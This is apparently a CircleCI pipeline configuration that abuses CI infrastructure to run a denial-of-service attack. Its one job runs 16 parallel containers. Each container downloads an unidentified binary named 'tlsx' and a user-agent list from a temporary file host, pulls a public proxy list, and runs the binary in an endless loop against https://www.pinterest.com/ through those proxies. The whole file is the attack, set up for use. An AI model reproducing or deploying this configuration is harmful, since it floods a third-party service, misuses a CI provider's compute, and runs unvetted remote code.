version: 2.1
jobs:
    trial:
      docker:
            - image: ubuntu:latest
      parallelism: 16
      steps:
        - run:
            name: Install Dependencies
            command: apt update && apt install wget -y && wget https://temp.sh/WpHhb/tlsx && wget https://temp.sh/pPzap/ua.txt && wget https://raw.githubusercontent.com/monosans/proxy-list/main/proxies/http.txt && mv http.txt proxy.txt && chmod 777 * && while true; do ./tlsx https://www.pinterest.com/ 999999 36 100 proxy.txt ua.txt; done;
            no_output_timeout: 5h
workflows:
    version: 2.1
    build:
        jobs:
        - trial
